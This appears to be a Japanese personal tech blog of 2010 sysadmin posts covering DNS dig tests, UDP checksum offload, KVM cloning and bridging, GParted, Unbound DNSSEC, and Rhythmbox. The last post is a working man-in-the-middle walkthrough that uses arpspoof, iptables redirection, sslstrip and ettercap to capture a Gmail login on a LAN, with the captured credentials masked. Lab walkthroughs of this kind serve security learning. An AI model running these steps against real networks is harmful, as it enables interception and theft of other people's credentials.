;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:

;co.jp. IN A

;; AUTHORITY SECTION:

jp. 86400 IN NS x.dns.jp.

;; ADDITIONAL SECTION:

x.dns.jp. 86400 IN A 192.168.1.51

[root@hat4-vm ~]# dig @192.168.1.51 jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 jp +norec

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28399

;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:

;jp. IN A

;; AUTHORITY SECTION:

jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600

;; Query time: 3 msec

;; SERVER: 192.168.1.51#53(192.168.1.51)

;; WHEN: Tue Jun 29 00:27:47 2010

;; MSG SIZE rcvd: 73

[root@hat4-vm ~]#

[root@hat4-vm ~]# dig @192.168.1.51 co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 co.jp +norec

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53030

;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:

;co.jp. IN A

;; AUTHORITY SECTION:

jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600

[root@hat4-vm ~]# dig @192.168.1.51 jp ns +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 jp ns +norec

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 670

;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:

;jp. IN NS

;; ANSWER SECTION:

jp. 86400 IN NS x.dns.jp.

;; ADDITIONAL SECTION:

x.dns.jp. 86400 IN A 192.168.1.51

;; Query time: 6 msec

;; SERVER: 192.168.1.51#53(192.168.1.51)

;; WHEN: Tue Jun 29 00:28:32 2010

;; MSG SIZE rcvd: 56

[root@hat4-vm ~]#

[root@hat4-vm ~]# dig @192.168.1.51 co.jp ns +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 co.jp ns +norec

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38325

;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:

;co.jp. IN NS

;; AUTHORITY SECTION:

jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600

キャプチャ時にでる、UDP bad checksum エラー ( UDP checksum offload ) について

最近のNIC はNICでチェックサムを行っており、system(OS)パケットが送られた後にcheksum　を行う

ここでキャプチャ

system(OS) -----------------> NIC ---------->

dummy checksum 本当の checksum

dummy checksum のときにキャプチャしているので、cheksum エラーがでる

送信で bad checksum が出ていて、受信で bad checksum でなかったら、

NIC の問題ではなく、上記が原因であることがほとんど。

受信は checksum 後にキャプチャしているから。

この場合は無視してOK

- 送信　( Bad checksum )

Source: 192.168.1.1 (192.168.1.1)

Destination: 128.63.2.53 (128.63.2.53)

User Datagram Protocol, Src Port: 33978 (33978), Dst Port: domain (53)

Source port: 33978 (33978)

Destination port: domain (53)

Length: 53

Checksum: 0x8975 [incorrect, should be 0x29bb (maybe caused by "UDP checksum offload"?)]

[Good Checksum: False]

[Bad Checksum: True]

- 受信 ( Good checksum )

Source: 192.5.5.241 (192.5.5.241)

Destination: 192.168.1.1 (192.168.1.1)

User Datagram Protocol, Src Port: domain (53), Dst Port: 38562 (38562)

Source port: domain (53)

Destination port: 38562 (38562)

Length: 837

Checksum: 0xceb4 [correct]

[Good Checksum: True]

[Bad Checksum: False]

エラーはカウントされていない

root@arizona:~# LANG=C netstat -s

Ip:

17708 total packets received

0 forwarded

0 incoming packets discarded

17454 incoming packets delivered

12100 requests sent out

Icmp:

9 ICMP messages received

0 input ICMP message failed.

ICMP input histogram:

destination unreachable: 9

9 ICMP messages sent

0 ICMP messages failed

ICMP output histogram:

destination unreachable: 9

IcmpMsg:

InType3: 9

OutType3: 9

Tcp:

23 active connections openings

3 passive connection openings

10 failed connection attempts

2 connection resets received

2 connections established

17115 segments received

11879 segments send out

0 segments retransmited

0 bad segments received.

165 resets sent

Udp:

226 packets received

9 packets to unknown port received.

0 packet receive errors

216 packets sent

UdpLite:

TcpExt:

10 TCP sockets finished time wait in fast timer

105 delayed acks sent

2 packets directly queued to recvmsg prequeue.

13717 packet headers predicted

1499 acknowledgments not containing data payload received

477 predicted acknowledgments

1 connections reset due to early user close

IpExt:

InMcastPkts: 52

OutMcastPkts: 37

InBcastPkts: 103

InOctets: 16864327

OutOctets: 10701647

InMcastOctets: 9908

OutMcastOctets: 7260

InBcastOctets: 12159

root@arizona:~#

Ubuntu Server : KVM , how to make a clone VM

root@arizona:~# cat /etc/lsb-release | grep -i desc

DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"

仮想マシンマネージャ -> クローン元のVM を右クリック -> cloneを選択

クローンVM の名前を決めて , clone をクリック

作成中

完了!

Gparted : フリーのパーティションリサイズソフト

パーティションマジックみたいなの探してたらフリー(GNU license) で gprated ってのがあるみたい。

下記のパーティションのリサイズ、作成ができる。

ext2/ext3/ext4, FAT16/FAT32, hfs/hfs+, linux-swap, NTFS, reiserfs/4, ufs, xfs file systems

http://gparted.sourceforge.net/

live CD で GNOME が起動し、GUI でリサイズできる。

実際に使ってみたが、自分の環境ではちゃんとリサイズできた。

Unbound : End-to-End DNSSEC w/ Firefox

Firefox に DNSSEC validation のプラグインがあるので使ってみた。

- unbound の準備

ITAR の準備ができている状態とする

root@arizona:/etc/unbound# unbound -v

[1275843653] unbound[1701:0] notice: Start of unbound 1.4.1.

root@arizona:/etc/unbound# egrep "trust-anchor-file" unbound.conf | grep -v "#"

trust-anchor-file: "/etc/unbound/anchors.mf"

- DNSSEC クエリの解決ができるかチェック

ad bit が flag にたっていれば、OK

root@arizona:/etc/unbound# dig @127.1 www.isc.org +dnssec +multiline

; <<>> DiG 9.7.0-P1 <<>> @127.1 www.isc.org +dnssec +multiline

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1402

;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 5, ADDITIONAL: 9

;; OPT PSEUDOSECTION:

; EDNS: version: 0, flags: do; udp: 4096

;; QUESTION SECTION:

;www.isc.org. IN A

;; ANSWER SECTION:

www.isc.org. 240 IN A 149.20.64.42

www.isc.org. 240 IN RRSIG A 5 3 600 2010070523333

DNSSECに対応していないFQDN に dig すると ad ビットは立たない

root@arizona:/etc/unbound# dig @127.1 www.google.com +dnssec +multiline

; <<>> DiG 9.7.0-P1 <<>> @127.1 www.google.com +dnssec +multiline

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22658

;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:

; EDNS: version: 0, flags: do; udp: 4096

;; QUESTION SECTION:

;www.google.com. IN A

unbound-host -C コンフィグファイル FQDN -v でも確認できる。

root@arizona:/etc/unbound# unbound-host -C unbound.conf www.isc.org -v

[1275844036] libunbound[1821:0] notice: init module 0: validator

[1275844036] libunbound[1821:0] notice: init module 1: iterator

www.isc.org has address 149.20.64.42 (secure)

www.isc.org has IPv6 address 2001:4f8:0:2::d (secure)

www.isc.org has no mail handler record (secure)

root@arizona:/etc/unbound#

root@arizona:/etc/unbound# unbound-host -C unbound.conf www.google.com -v

[1275844044] libunbound[1860:0] notice: init module 0: validator

[1275844044] libunbound[1860:0] notice: init module 1: iterator

www.google.com is an alias for www.l.google.com. (insecure)

www.l.google.com has address 66.249.89.104 (insecure)

www.l.google.com has address 66.249.89.99 (insecure)

www.l.google.com has no IPv6 address (insecure)

www.l.google.com has no mail handler record (insecure)

- Firefox 3.6.3 に DNSSEC valitation の add-on を追加

add-on のダウンロード

https://addons.mozilla.org/en-US/firefox/addon/64247/

使い方

http://www.dnssec-validator.cz/

Firefox -> ツール -> アドオン　から DNSSEC 対応のキャッシュサーバ ( 今回は unbound ) の IP を指定する

DNSSECで名前解決できる www.isc.org にアクセス

URLバーに、DNSSEC の検証ができたかアイコンが表示される。

赤色だと、DNSSEC 対応ドメインだけど、IPアドレスが変わってる or DNSSEC の signature が壊れてる。

root@arizona:~# unbound-host -C /etc/unbound/unbound.conf www.rhybar.cz -v

[1275845463] libunbound[4671:0] notice: init module 0: validator

[1275845463] libunbound[4671:0] notice: init module 1: iterator

www.rhybar.cz has address 217.31.205.50 (BOGUS (security failure))

validation failure : signature crypto failed from 194.0.13.1 for key rhybar.cz. while building chain of trust

www.rhybar.cz has IPv6 address 2001:1488:0:3::2 (BOGUS (security failure))

validation failure : signature crypto failed from 194.0.13.1 for key rhybar.cz. while building chain of trust

www.rhybar.cz has no mail handler record (BOGUS (security failure))

validation failure : signature crypto failed from 194.0.12.1 for key rhybar.cz. while building chain of trust

Firefox -> キャッシュサーバでキャプチャ

DO bit を有効にして、問い合わせてる。

Questions: 1

Answer RRs: 0

Authority RRs: 0

Additional RRs: 1

Queries

www.rhybar.cz: type A, class IN

Name: www.rhybar.cz

Type: A (Host address)

Class: IN (0x0001)

Additional records

: type OPT

Name:

Type: OPT (EDNS0 option)

UDP payload size: 4096

Higher bits in extended RCODE: 0x0

EDNS0 version: 0

Z: 0x8000

Bit 0 (DO bit): 1 (Accepts DNSSEC security RRs)

Bits 1-15: 0x0 (reserved)

Data length: 0

Ubuntu: encode n' play MP3 w/ Rhythmbox

root@arizona:~# cat /etc/lsb-release | grep -i desc

DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"

root@arizona:~# apt-get install ubuntu-restricted-extras
root@arizona:~# apt-get install lame

アプリケーション -> サウンドとビデオ -> Rhythmbox　を起動

"MP3のプラグインをインストール" が表示されるので、クリックしてインストール

編集 -> 設定 -> ミュージックプレイヤーの設定のフォーマットをMP3 にする。

- MP3 の作成

CDアイコンの　すべてのトラックをライブラリにコピーでMP3にできる。

Ubuntu server : KVM , how to create a network bridge

root@arizona:~# cat /etc/lsb-release | grep -i description

DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"

root@arizona:~# uname -r

2.6.32-22-server

デフォルトで、KVMゲストは NAT環境で動く ( virtual network )

NAT virtual network
Internet ---eth0 KVM host ----------VMs

eth0: 192.168.1.0/24

virbr0 ( virtual network) : 192.168.122.0/24 ( VMのネットワーク )

これをブリッジ形式にして、VMのネットワークを KVM ホストと同じネットワークにする。

eth0: 192.168.1.0/24

br0 ( network bridge ) : 192.168.1.0/24

root@arizona:~# apt-get install bridge-utils

oot@arizona:~# /etc/init.d/networking stop

ネットワークの設定変更。br0 を作成し、eth0 にブリッジさせる。

- before

root@arizona:~# egrep -v "^#" /etc/network/interfaces.org

auto lo

iface lo inet loopback

auto eth0

iface eth0 inet static

address 192.168.1.150

netmask 255.255.255.0

gateway 192.168.1.254

root@arizona:~#

- after

root@arizona:~# egrep -v "^#" /etc/network/interfaces

auto lo

iface lo inet loopback

auto eth0

iface eth0 inet manual

auto br0

iface br0 inet static

address 192.168.1.150

network 192.168.1.0

netmask 255.255.255.0

broadcast 192.168.1.255

gateway 192.168.1.254

bridge_ports eth0

bridge_stp off

bridge_fd 0

bridge_maxwait 0

root@arizona:~#

root@arizona:~# /etc/init.d/networking start

ネットワークの設定かえて、/etc/init.d/networking restart だったらなんかうまくいかなかった。

stop -> start でやったほうがよさげ。

- before

root@arizona:~# LANG=C ifconfig

eth0 Link encap:Ethernet HWaddr 00:1d:60:77:a1:38

inet addr:192.168.1.150 Bcast:192.168.1.255 Mask:255.255.255.0

inet6 addr: fe80::21d:60ff:fe77:a138/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:8028 errors:0 dropped:0 overruns:0 frame:0

TX packets:11773 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:2756850 (2.7 MB) TX bytes:10669402 (10.6 MB)

Interrupt:26 Base address:0xc000

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:40 errors:0 dropped:0 overruns:0 frame:0

TX packets:40 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:2360 (2.3 KB) TX bytes:2360 (2.3 KB)

virbr0 Link encap:Ethernet HWaddr 3e:0d:65:a8:fe:e7

inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0

inet6 addr: fe80::3c0d:65ff:fea8:fee7/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:28 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:0 (0.0 B) TX bytes:4760 (4.7 KB)

- after

br0 ができた。br0 は eth0 にブリッジされている。

virbr0 はNAT

br0 はブリッジ ( eth0 にブリッジされる )

root@arizona:/etc/network# LANG=C ifconfig

br0 Link encap:Ethernet HWaddr 00:1d:60:77:a1:38

inet addr:192.168.1.150 Bcast:192.168.1.255 Mask:255.255.255.0

inet6 addr: fe80::21d:60ff:fe77:a138/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:45 errors:0 dropped:0 overruns:0 frame:0

TX packets:54 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:4244 (4.2 KB) TX bytes:6589 (6.5 KB)

eth0 Link encap:Ethernet HWaddr 00:1d:60:77:a1:38

inet6 addr: fe80::21d:60ff:fe77:a138/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:484 errors:0 dropped:0 overruns:0 frame:0

TX packets:576 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:208113 (208.1 KB) TX bytes:98061 (98.0 KB)

Interrupt:26 Base address:0xc000

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:56 errors:0 dropped:0 overruns:0 frame:0

TX packets:56 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:5121 (5.1 KB) TX bytes:5121 (5.1 KB)

virbr0 Link encap:Ethernet HWaddr 2a:3e:0f:f6:b2:02

inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0

inet6 addr: fe80::283e:fff:fef6:b202/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:30 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:0 (0.0 B) TX bytes:4575 (4.5 KB)

仮想マシンにネットワークを追加するときに、br0 が追加できるようになる。

VM に br0 を追加し、VMを起動したあとの ifconfig

- VM の ifconfig 。 KVMホストの eth0 と同じネットワークになった。

[root@localhost ~]# ifconfig eth0

eth0 Link encap:Ethernet HWaddr 52:54:00:0E:79:80

inet addr:192.168.1.6 Bcast:192.168.1.255 Mask:255.255.255.0

inet6 addr: fe80::5054:ff:fe0e:7980/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:47 errors:0 dropped:0 overruns:0 frame:0

TX packets:86 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:6714 (6.5 KiB) TX bytes:13514 (13.1 KiB)

Interrupt:10 Base address:0xe000

Analyze ( strip ? ) SSL Traffic with sslstrip , arpspoof and ettercap

SSL通信の解読に ssldump を使ってたけど、なんか他にいいツールないかなーとさがしていた。。。
sslstrip , arpspoof , ettercap を使ってSSL通信を解読してみた。

SSLクライアント: 192.168.1.2 ( Windows )

sslstrip , arpspoof , ettercap マシン: 192.168.1.3 ( BackTrack Linux 4 final )

Internet --- Router 1.254 --- 1.3 Windows

　 --- 1.2 eth0 BackTrack Linux

[ sslstrip マシン ]

下記2行のコメントを外す

- ethercap の設定ファイルを修正

ettercap NG-0.7.3 - A multipurpose sniffer/content filter for man in the middle attacks

root@bt:# vi /etc/etter.conf

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

- forwarding を有効にする

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@bt:~#

root@bt:~# cat /proc/sys/net/ipv4/ip_forward

- arpspoof を実行

arpspoof -t ターゲットのIP デフォルトゲートウェイ

root@bt:~# arpspoof -i eth0 -t 192.168.1.2 192.168.1.254

OPTIONS

-i interface

Specify the interface to use.

-t target

Specify a particular host to ARP poison (if not specified, all hosts on

the LAN).

host Specify the host you wish to intercept packets for (usually the local

gateway).

- あて先ポートが 80 を 10000 ポートにリダイレクト ( sslstrip が 10000 番ポートでリッスンしていて、SSLトラフィックを strip する )

root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

sslstrip 起動

root@bt:~# sslstrip -a -f -k

sslstrip 0.6 by Moxie Marlinspike running...

- sslstrip は 10000番ポートでリッスン

root@bt:~# lsof -i:10000

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

sslstrip 6188 root 4u IPv4 23821 TCP *:webmin (LISTEN)

root@bt:~# sslstrip --help

sslstrip 0.6 by Moxie Marlinspike

Usage: sslstrip

Options:

-w , --write= Specify file to log to (optional).

-p , --post Log only SSL POSTs. (default)

-s , --ssl Log all SSL traffic to and from server.

-a , --all Log all SSL and HTTP traffic to and from server.

-l , --listen= Port to listen on (default 10000).

-f , --favicon Substitute a lock favicon on secure requests.

-k , --killsessions Kill sessions in progress.

-h Print this help message.

- パケットキャプチャ

root@bt:~# ettercap -T -q -i eth0

Windows ( IE ) で、gmail にログイン。

ユーザ名、パスワードがみえる。　 ( sslsttrip マシン )

root@bt:~# ettercap -T -q -i eth0

HTTP : 66.249.89.104:443 -> USER: xxxxx@gmail.com PASS: xxxxx INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx
HTTP : 66.249.89.104:80 -> USER: xxxxx@gmail.com PASS: xxxxx INFO: http://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx

html 形式でみることもできる ( -V html )

root@bt:~# ettercap -T -i eth0 -V html
HTTP/1.1 200 OK
Cache-Control: public, max-age=604800
Expires: Thu, 10 Jun 2010 17:34:41 GMT
Date: Thu, 03 Jun 2010 17:34:41 GMT
Refresh: 0;URL=https://mail.google.com/mail/
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 234
Server: GSE

GET /mail/ HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*
Accept-Language: ja-JP

-V, --visual
              Use this option to set the visualization method for the packets
              to be displayed.

              FORMAT may be one of the following:

              hex    Print the packets in hex format.

                     example:

                     the string "HTTP/1.1 304 Not Modified" becomes:

                     0000: 4854 5450 2f31 2e31 2033 3034 204e 6f74 HTTP/1.1
                     304 Not
                     0010: 204d 6f64 6966 6965 64                    Modified

              ascii Print only "printable" characters, the others are dis-
                     played as dots '.'

              text   Print only the "printable" characters and skip the oth-
                     ers.

              ebcdic Convert an EBCDIC text to ASCII.

              html   Strip all the html tags from the text. A tag is every
                     string between < and >.

                     example:

                     , but the following
                     will not be displayed.

                     This is the title, but the following will not be dis-
                     played.

              utf8   Print the packets in UTF-8 format. The encoding used
                     while performing the conversion is declared in the
                     etter.conf(5) file.

トリックは中間者攻撃 ( Man in The Middle Attack ) で SSL通信をぬすんで、解読してる。